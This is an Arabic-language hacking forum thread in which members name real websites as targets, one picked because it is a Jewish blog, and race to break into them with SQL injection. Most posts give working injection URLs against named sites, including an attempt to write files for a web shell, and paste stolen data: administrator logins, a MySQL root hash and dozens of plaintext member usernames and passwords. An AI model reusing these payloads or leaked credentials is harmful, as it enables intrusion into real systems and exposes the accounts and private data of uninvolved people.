![]() |
اقتباس:
معاك حق فعلا هما يحبون الشي يجيهم جاهز وكامل... ضع الهدف وتوكل وراح نترك الهدف لبكرا ممكن احد الاعضاء يشارك معانا ويحقنو تحياتي^_^ [/align] |
هذا هو الهدف الجديد blog يهودي مع العلم أنني أريد خطوات الإختراق كل أمر قمت به و العقبات التي صادفتك كود: http://blog.soundcat.org/post.php?id=12 |
Master vbspiders صدقني ماراح يحقنو ولا واحد ولو تتركه أسبوع كامل |
اقتباس:
لانو فيه تخمين ننتظر لبكرا والله كريم تحياتي[/align] |
اليكم هذا الموقع http://www.slatina-online.ro/adauga_...ue&categorie=5 |
جاري أخ marrak |
اقتباس:
يرجى التأكد و الله أعلم |
شوف الموقع بثغرة into outfile تقدر ترفع شيل لازم مسار مصرح http://www.talkeetnachamber.org/news...,7,8,9,10,11-- و يتيح الطباعة قمت بتكوين ملف في مجلد tmp http://www.talkeetnachamber.org/news.php?id=158+AND+1=2+UNION+SELECT+1,2,3,'d4rk-h4ck3r',5,6,7,8,9,10,11+into+outfile"/tmp/d4rk.txt" http://www.talkeetnachamber.org/news...,7,8,9,10,11-- لول تمت طباعة اسمي يعني يتيح الطباعة فقط ما زال معرفة مسارنا بالسيرفر اذا وجدناه اضمنلك شل مرفوع |
d4rK-h4ck3r هههههههههههههههههههههه مازال ماوصلتش لهاذ الدرجة من الإحتراف أخي الكريم ههههههههههههههههههههههههههههههههههههههههههههههه |
اخي هذه الفائدة من المشاركات مزيد التعلم و ان شاء الله تتقن مثل هذا النوع من الثغرات كما ان الاخوة من الجزائر سريعوا التعلم و هم النخبة في الاختراق اولهم الاسطورة his0k4 و ان شاء الله تتوصل لاختراقه العبرة في المحاولة ;) |
تعم أخي العزيز أول مرة أتعلم السيكول في 2 ساعات إخترفت موقع ههههههههههههههههههههههه اليوم فقط رجعت النت قوية أرجو أن تتواصل هكذا لكي أعود إلى التعلم من جديد |
ان شاء الله لما احسن و انا سارفعلك شرح عامله لاستغلال هذا النوع من الثغرات لكن اصبر علي شوي lol |
اقتباس:
there exist some account you can so use it username:password florintele:356746 giba:123 office:456 keepto.ro:12345 . . . regards |
تم الدعس اقتباس:
حياك الله أخي الكريم الموقع مصاب و يكفي تغيير السكريبت. الاستغلال الكامل كود: http://www.slatina-online.ro/detalii_anunt.php?id_anunt=267&id_categ=3&id_subcateg=-22%20union%20select%201,2,concat_ws(0x3a,id,user,parola)+from+utilizatori-- |
[align=center]ممممم بالنسبة للموقع الاول : http://blog.soundcat.org/post.php?id=12 ما قدرت اخمن الجداول للاسف... واما الموقع الثاني تبع الاخ marrak فبالبداية كان تفكيري مثل الاخ ooooo_darkman_ooooo يعني ما في خطا اصلا والموقع مش مصاب لكن بعدها فكرت اجرب بسكربت ثاني وعلى نفس الموقع ونجحت والاخ m0h@med وضع الاستغلال قبلي وهذا هو : كود PHP: والباس هو : 356746 ولوحة الدخول : http://www.slatina-online.ro/ هناك تسجيل دخول واضح بالصفحة الرئسية تم الدخول بنجاح بارك الله فيكم جميعا... عمل منظم ورائع تحياتي [/align] |
[align=center]تم تقييم كل من الاخ : ooooo_darkman_ooooo & m0h@med ++بارك الله فيكم++ ++تحياتي++ [/align] |
شكرا أخي d4rK-h4ck3r :) =================== |
m0h@med ========== ههههههههههههههههههههههه أخي الكريم أنا لم أبحث في سكربتات الموقع أنا إعتقدت أنو الرابط اللي حطو الأخ الكريم النتغير اللي فيه هو المصاب =========================== شكرا على التنبيه +نتمنى مايكون الدعس الأخير + ممكن حد يشرحلى الأمر concat_ws(0x3a,id,user,parola) وشكرا منتظركم |
بارك الله فيك أنت أخي Master vbspiders على الموصوع الجميل + بالنسبة للموقع (البلوق اليهودي ) نفس الشيئ معي أرجو من الإدارة تقييم الموضضوع |
[align=center]الهدف الجديد : http://www.marmoon.com/pregames.php?id=383 بدنا سرعة في الحقن هجوم يا ابطال تحياتي [/align] |
جاري |
merci |
آسف على التأخير لوول عم أفك 2500 هاش :etonnement-29[1]: المهم ...! تم الحقن بنجاح و قد أحسنت الإختيار أخي الكريم هذه المرة الموقع سهل و لكن لازم ذكاء شوي :) تفضل الحقنة كاملة : كود: http://www.marmoon.com/pregames.php?id=-383 UNION SELECT 1,2,3,group_concat(id,0x3a,admin,0x3a,pass),5,6,7,8,9,10,11,12,13+from+admin-- الأدمن : admin الباسوارد : asdfgh بالنسبة للوحة : Forbidden :) بالتوفيق |
ههههه سبقوني ماشاءء الله مزيد من الاهداف |
الشبح المرح لا تلعب معي في الـ SQL لوول أمزح ههه |
ههههههههههه طبعا اخوي راح ابححث لكم عن هدف خخخخخ و نشوف شطارتكم هههههههههههه |
راح اضع هدف بعد اذنك ياماستر http://www.factorytoursusa.com/TourD...asp?TourID=134 ارجو عدم استعمال برامج الحقن ههههههههه يدوي فقط |
Sorry I'm Not Good In ASP smilies2 GOOD LUCK |
اذا ظع لنا هدف جيد هههههههههههه |
أوكي على عيني يا شبح ( بخاف من إسمك مستحيل أرفض لك طلب ) لوول |
أوكي تفضلوا : كود: http://www.itmaasia.com/news.php?id=1 فقط بالنسبة للوحة حاولت الآن أبحث عنها بدون جدوى يعطي لوحة مزيفة :) بالتوفيق |
لول تم سحب باس الرووت شوف الموقع وحيد على الاستضافة http://www.bing.com/search?q=ip%3A12...=QBRE&filt=all و هذي الحقنة http://www.itmaasia.com/news.php?id=...rom+mysql.user localhost:citme_wanhu:*609F3B964379BF9A15167B8D55D A325DBC3A32E6 الباس مشفر تشفير Sha1 |
بالنسبة لباس اللوحة http://www.itmaasia.com/news.php?id=...uth.user_pwd-- xampp:wampp البيانات في وسط الصفحة في الخطا |
GooD و الله العظيم كنت أنتظر واحد يفيق للـ MYSQL لوول بالتوفيق |
اقتباس:
حبيبي الغالي بارك الله فيك على شغلك الحلو جاري التقييم واصل معانا ولا تحرمنا من مرورك تحياتي |
mercii |
اقتباس:
خذ راحتك اخي الغالي تحياتي |
اقتباس:
شغل روعة والله تسلم ايدك.. اسف هالمرة بدون تقييم خليها عالموقع الي بعدو ومن عيوني احلى تقييم لاحلى عضو بالشبكة تحياتي |
تم حقن الموقع http://www.itmaasia.com/ بنجاح والحمد لله نتائج الحقن تم استخراج يوزر وباس المدير تم استخراج يوزرات وكلمات سر الاعضاء تم استخراج يوزر وباس وهوست الروت وهذه هي الحقن: __________________________ حقنة استخراج الادمن: من الجدول tb_admin:password:exhibition وهذه هي العواميد: tb_admin:admin_id:exhibition tb_admin:username:exhibition tb_admin:password:exhibition tb_admin:flag:exhibition tb_admin:remark:exhibition tb_admin:is_del:exhibition الحقنة: http://www.itmaasia.com/news.php?id=...rom+tb_admin-- بيانات الادمن(لم استطع فك كلمة السر) wanhu 934f9012bc20d2aa4713f45afcb9a076 ___________________________ حقنة استخراج بيانات الأعضاء: من الجدول tb_member:mem_pass:exhibition وهذه هي العواميد: tb_member:id:exhibition tb_member:mem_name:exhibition tb_member:mem_pass:exhibition الحقنة:http://www.itmaasia.com/news.php?id=...om+tb_member-- بيانات الاعضاء (كلمات السر بدون تشفير): اسم المستخدم في اليسار واباس الى اليمين 13:W2D72:KINEXBRG7136 12:E1A52:59192665 11:w5c02:123456 10:W2D06:schwing2010 14:E4A70:H8733 15:E4A71:G8733 16:W5D12:itma99 17:W5A05:kugler 18:w3c71:law5c71 19:E3A05:richpeace 20:E2C63:731212 21:W4D01:Santex10 22:E4A10:bolondomb 23:E2D01:Terrot 24:E3D08:809642 25:E3D02:62226 26:W1A21:W1A21 27:W1a03:W1a03 28:w1a22:w1a22 29:w1a22:w1a22 30:w1a22:w1a22 31:w1a23:w1a23 32:w1a02:w1a02 33:E3D07:7437 34:E1C20:expoasia 35:E2D83:86171738 36:E2D22:E2D22 37:w4b01:86462690 38:e4d03:777777 39:$_SESSION[login_ok]:123456 40:wanhu:tongkong 41:W2A52:W2A52 42:w4d73:62576999 43:E1C65:165 44:E3A61:123 45:W2D52:bodah ________________________ حقنة استخراج الرووت: من الجدول: user:Password:mysql مع ادخال السيجما الى الحقنة وهذه هي العواميد: servers:Server_name:mysql servers:Host:mysql servers:Db:mysql servers:Username:mysql servers:Password:mysql servers:Port:mysql servers:Socket:mysql servers:Wrapper:mysql servers:Owner:mysql الحقنة:http://www.itmaasia.com/news.php?id=...m+mysql.user-- بيانات الروت: citme_wanhu *609F3B964379BF9A15167B8D55DA325DBC3A32E6 باقي ان نجد لوحة التحكم الصحيحة وندخل جربت الجدول servers:Password:mysql ولكنني وجدته فارغ الله يعطيكم الف عافية ياشباب للعلم انني لم اخذ شي من حقنة الاخ d4rK-h4ck3r وله وللجميع جزيل الشكر |
إجابة كاملة و موفقة هاته هي الحقنة المثالية بارك الله فيك أعجبكم الهدف ؟؟؟ لوول |
الساعة الآن 02:29 PM |
[ vBspiders.Com Network ]